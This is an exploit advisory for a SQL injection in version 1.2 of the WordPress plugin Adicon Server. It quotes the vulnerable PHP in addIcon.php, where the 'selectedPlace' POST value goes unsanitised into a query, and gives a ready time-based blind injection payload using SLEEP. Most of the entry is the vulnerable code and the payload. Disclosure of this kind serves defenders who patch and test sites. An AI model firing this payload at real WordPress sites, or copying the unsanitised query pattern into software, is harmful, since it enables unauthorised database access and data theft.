1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection # Date: 2018-12-28 # Software Link: https://wordpress.org/plugins/adicons/ # Exploit Author: Kaimi # Website: https://kaimi.io # Version: 1.2 # Category: webapps # SQL Injection # File: addIcon.php # Vulnerable code: # $placement=$_POST['selectedPlace']; # $x=explode("_",$placement); # $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]); # Example payload: selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- - |